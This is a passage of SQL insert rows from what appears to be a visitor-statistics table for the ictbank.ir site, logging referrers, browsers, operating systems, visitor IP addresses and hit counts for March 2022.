(19229,'2022-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.4.154','000',0,2,0),
(19230,'2022-03-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(19231,'2022-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(19232,'2022-03-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.103','000',0,2,0),
(19233,'2022-03-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','151.75.84.211','000',0,1,0),
(19234,'2022-03-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.57','000',0,2,0),
(19235,'2022-03-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','194.126.117.170','000',0,1,0),
(19236,'2022-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.150.50','000',0,1,0),
(19237,'2022-03-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','85.159.213.216','000',0,2,0),
(19238,'2022-03-09','http://ghafeandishe.ir','Chrome','Windows','10.0',NULL,NULL,'','95.135.89.137','000',0,1,0),
(19239,'2022-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19240,'2022-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(19241,'2022-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19242,'2022-03-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19243,'2022-03-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','40.88.41.33','000',0,1,0),
(19244,'2022-03-09','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.207.110.133','000',0,1,0),
(19245,'2022-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(19246,'2022-03-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.168.237.186','000',0,2,0),
(19247,'2022-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.128.246.12','000',0,2,0),
(19248,'2022-03-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','46.213.198.173','000',0,1,0),
(19249,'2022-03-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.116.86.115','000',0,1,0),
(19250,'2022-03-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(19251,'2022-03-10','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.66.181','000',0,1,0),
(19252,'2022-03-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(19253,'2022-03-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(19254,'2022-03-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.16.255','000',0,1,0),
(19255,'2022-03-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.99.3.216','000',0,2,0),
(19256,'2022-03-10','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','5.236.163.155','000',0,2,0),
(19257,'2022-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19258,'2022-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19259,'2022-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19260,'2022-03-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19261,'2022-03-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.148','000',0,2,0),
(19262,'2022-03-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(19263,'2022-03-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19264,'2022-03-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','40.88.41.33','000',0,1,0),
(19265,'2022-03-10','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','20.106.121.16','000',0,1,0),
(19266,'2022-03-11','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','154.160.7.152','000',0,1,0),
(19267,'2022-03-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(19268,'2022-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(19269,'2022-03-11','http://ictbank.ir/blog','Safari','iOS','13.3.1',NULL,NULL,'','50.31.21.9','000',0,2,0),
(19270,'2022-03-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19271,'2022-03-11','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(19272,'2022-03-11','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','123.245.25.227','000',0,1,0),
(19273,'2022-03-11','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','82.102.9.14','000',0,1,0),
(19274,'2022-03-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19275,'2022-03-11','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','2.179.39.237','000',0,1,0),
(19276,'2022-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.204.244.202','000',0,1,0),
(19277,'2022-03-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(19278,'2022-03-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.12','000',0,1,0),
(19279,'2022-03-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(19280,'2022-03-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.49.95','000',0,1,0),
(19281,'2022-03-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(19282,'2022-03-11','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','51.142.88.231','000',0,9,0),
(19283,'2022-03-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.217.153','000',0,1,0),
(19284,'2022-03-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.52','000',0,1,0),
(19285,'2022-03-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.119','000',0,2,0),
(19286,'2022-03-12','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','18.219.212.38','000',0,4,0),
(19287,'2022-03-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(19288,'2022-03-12','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.193','000',0,1,0),
(19289,'2022-03-12','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','77.68.84.188','000',0,10,0),
(19290,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.204.244.202','000',0,1,0),
(19291,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.165.217','000',0,1,0),
(19292,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(19293,'2022-03-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.105','000',0,4,0),
(19294,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.248.33','000',0,1,0),
(19295,'2022-03-12','https://www.google.be/','Chrome','Windows','10.0',NULL,NULL,'','87.67.229.60','000',0,2,0),
(19296,'2022-03-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19297,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.76.164','000',0,2,0),
(19298,'2022-03-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.102.209.13','000',0,1,0),
(19299,'2022-03-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,3,0),
(19300,'2022-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(19301,'2022-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(19302,'2022-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19303,'2022-03-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19304,'2022-03-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19305,'2022-03-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.138','000',0,2,0),
(19306,'2022-03-12','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
(19307,'2022-03-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(19308,'2022-03-13','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','129.0.79.250','000',0,1,0),
(19309,'2022-03-13','http://wikisonnati.com/blog','Chrome','Windows','5.1',NULL,NULL,'','216.158.239.30','000',0,1,0),
(19310,'2022-03-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','47.185.247.119','000',0,1,0),
(19311,'2022-03-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','191.96.150.209','000',0,3,0),
(19312,'2022-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.92.135.211','000',0,1,0),
(19313,'2022-03-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','209.120.227.2','000',0,1,0),
(19314,'2022-03-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(19315,'2022-03-13','https://www.google.com/','Chrome','Android','12',NULL,NULL,'','66.102.6.83','000',0,1,0),
(19316,'2022-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.237.45.203','000',0,2,0),
(19317,'2022-03-13','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','85.25.43.21','000',0,2,0),
(19318,'2022-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','156.208.229.121','000',0,1,0),
(19319,'2022-03-13','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','95.105.124.208','000',0,6,0),
(19320,'2022-03-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.166.30','000',0,1,0),
(19321,'2022-03-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','153.92.0.2','000',0,1,0),
(19322,'2022-03-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.12','000',0,2,0),
(19323,'2022-03-13','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','54.83.255.193','000',0,1,0),
(19324,'2022-03-13','http://wikisonnati.com/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.8','000',0,7,0),
(19325,'2022-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(19326,'2022-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19327,'2022-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(19328,'2022-03-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(19329,'2022-03-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,4,0),
(19330,'2022-03-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','46.3.166.57','000',0,1,0),
(19331,'2022-03-13','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(19332,'2022-03-13','http://www.design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','51.89.190.204','000',0,2,0),
(19333,'2022-03-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','121.57.226.176','000',0,1,0),
(19334,'2022-03-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,5,0),
(19335,'2022-03-14','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.213','000',0,3,0),
(19336,'2022-03-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,5,0),
(19337,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.150.164.178','000',0,11,0),
(19338,'2022-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19339,'2022-03-14','http://wikisonnati.com/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.177.79.178','000',0,2,0),
(19340,'2022-03-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.13','000',0,2,0),
(19341,'2022-03-14','http://www.ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','51.89.190.204','000',0,4,0),
(19342,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.188.51.250','000',0,2,0),
(19343,'2022-03-14','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','83.217.69.230','000',0,2,0),
(19344,'2022-03-14','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','123.253.235.38','000',0,1,0),
(19345,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.212.0','000',0,1,0),
(19346,'2022-03-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.33.96.205','000',0,2,0),
(19347,'2022-03-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','188.138.1.68','000',0,2,0),
(19348,'2022-03-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.55','000',0,2,0),
(19349,'2022-03-14','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','184.169.211.193','000',0,1,0),
(19350,'2022-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.219.2','000',0,1,0),
(19351,'2022-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19352,'2022-03-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(19353,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.21','000',0,1,0),
(19354,'2022-03-14','https://www.google.com/','Firefox','OS X','10.15',NULL,NULL,'','83.128.240.227','000',0,1,0),
(19355,'2022-03-14','http://82.102.9.14/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.113.11','000',0,6,0),
(19356,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.84.127.222','000',0,2,0),
(19357,'2022-03-14','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(19358,'2022-03-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.145','000',0,2,0),
(19359,'2022-03-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(19360,'2022-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.74.177.119','000',0,1,0),
(19361,'2022-03-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,14,0),
(19362,'2022-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','109.70.100.28','000',0,1,0),
(19363,'2022-03-15','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','182.253.131.168','000',0,1,0),
(19364,'2022-03-15','http://ictbank.ir/blog','Chrome','OS X','10.12.6',NULL,NULL,'','68.67.155.230','000',0,1,0),
(19365,'2022-03-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','72.167.58.227','000',0,1,0),
(19366,'2022-03-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','180.126.197.83','000',0,1,0),
(19367,'2022-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(19368,'2022-03-15','http://82.102.9.14/blog','Chrome','Android','10.0',NULL,NULL,'','221.130.37.193','000',0,1,0),
(19369,'2022-03-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(19370,'2022-03-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.150.59','000',0,1,0),
(19371,'2022-03-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,2,0),
(19372,'2022-03-15','https://www.google.com/','Firefox','OS X','10.14',NULL,NULL,'','58.65.212.10','000',0,1,0),
(19373,'2022-03-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','85.25.43.21','000',0,2,0),
(19374,'2022-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19375,'2022-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(19376,'2022-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19377,'2022-03-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19378,'2022-03-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19379,'2022-03-15','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(19380,'2022-03-16','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','153.246.24.162','000',0,1,0),
(19381,'2022-03-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(19382,'2022-03-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(19383,'2022-03-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(19384,'2022-03-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.251.226','000',0,2,0),
(19385,'2022-03-16','http://wikisonnati.com/blog/','Chrome','Windows','6.2',NULL,NULL,'','156.146.63.19','000',0,2,0),
(19386,'2022-03-16','https://www.google.ca/','Chrome','Windows','10.0',NULL,NULL,'','24.230.240.18','000',0,1,0),
(19387,'2022-03-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.12','000',0,2,0),
(19388,'2022-03-16','http://wikisonnati.com/blog/','Chrome','Windows','6.3',NULL,NULL,'','188.124.36.33','000',0,7,0),
(19389,'2022-03-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.68.239.207','000',0,2,0),
(19390,'2022-03-16','http://ictbank.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.144','000',0,6,0),
(19391,'2022-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.52.129','000',0,1,0),
(19392,'2022-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(19393,'2022-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(19394,'2022-03-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19395,'2022-03-17','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','188.138.1.68','000',0,2,0),
(19396,'2022-03-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(19397,'2022-03-17','http://ictbank.ir','Internet Explorer','Windows','6.1',NULL,NULL,'','113.78.58.74','000',0,11,0),
(19398,'2022-03-17','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','182.138.137.98','000',0,1,0),
(19399,'2022-03-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(19400,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.86.146','000',0,2,0),
(19401,'2022-03-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.111.42.6','000',0,2,0),
(19402,'2022-03-17','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','118.123.105.87','000',0,2,0),
(19403,'2022-03-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,1,0),
(19404,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.77.10.44','000',0,1,0),
(19405,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','86.109.32.73','000',0,3,0),
(19406,'2022-03-17','http://cato.brightcloud.com/','Chrome','Windows','10.0',NULL,NULL,'','116.110.41.82','000',0,4,0),
(19407,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.124.94.198','000',0,53,0),
(19408,'2022-03-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(19409,'2022-03-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','151.55.23.29','000',0,1,0),
(19410,'2022-03-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.12','000',0,2,0),
(19411,'2022-03-17','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','85.25.43.21','000',0,2,0),
(19412,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.87.68','000',0,1,0),
(19413,'2022-03-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.86.142','000',0,1,0),
(19414,'2022-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,2,0),
(19415,'2022-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(19416,'2022-03-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(19417,'2022-03-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(19418,'2022-03-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.100.251','000',0,1,0),
(19419,'2022-03-17','http://ictbank.ir/blog/category/os/','Chrome','Windows','6.1',NULL,NULL,'','45.174.88.13','000',0,1,0),
(19420,'2022-03-17','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','178.67.38.193','000',0,6,0),
(19421,'2022-03-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19422,'2022-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.203.56.78','000',0,2,0),
(19423,'2022-03-18','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.223','000',0,1,0),
(19424,'2022-03-18','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.226','000',0,1,0),
(19425,'2022-03-18','http://ictbank.ir/blog','Samsung Internet','Android','8.0.0',NULL,NULL,'','91.133.142.139','000',0,1,0),
(19426,'2022-03-18','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','68.144.61.15','000',0,1,0),
(19427,'2022-03-18','http://ictbank.ir/blog','Android Browser','Android','11',NULL,NULL,'','126.44.200.91','000',0,1,0),
(19428,'2022-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.32.222.244','000',0,2,0),
(19429,'2022-03-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,5,0),
(19430,'2022-03-18','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','167.86.98.113','000',0,10,0),
(19431,'2022-03-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.62.243.165','000',0,2,0),
(19432,'2022-03-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','184.105.108.10','000',0,2,0),
(19433,'2022-03-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','156.146.36.94','000',0,1,0),
(19434,'2022-03-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(19435,'2022-03-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(19436,'2022-03-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.187.171.171','000',0,1,0),
(19437,'2022-03-18','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','83.171.248.58','000',0,2,0),
(19438,'2022-03-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','109.252.169.95','000',0,2,0),
(19439,'2022-03-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.197','000',0,2,0),
(19440,'2022-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(19441,'2022-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(19442,'2022-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.244.166.70','000',0,1,0),
(19443,'2022-03-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(19444,'2022-03-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(19445,'2022-03-19','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(19446,'2022-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.176.132','000',0,1,0),
(19447,'2022-03-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(19448,'2022-03-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(19449,'2022-03-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(19450,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.239.58.107','000',0,1,0),
(19451,'2022-03-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,4,0),
(19452,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(19453,'2022-03-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','171.22.76.32','000',0,5,0),
(19454,'2022-03-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(19455,'2022-03-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.136.18','000',0,1,0),
(19456,'2022-03-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
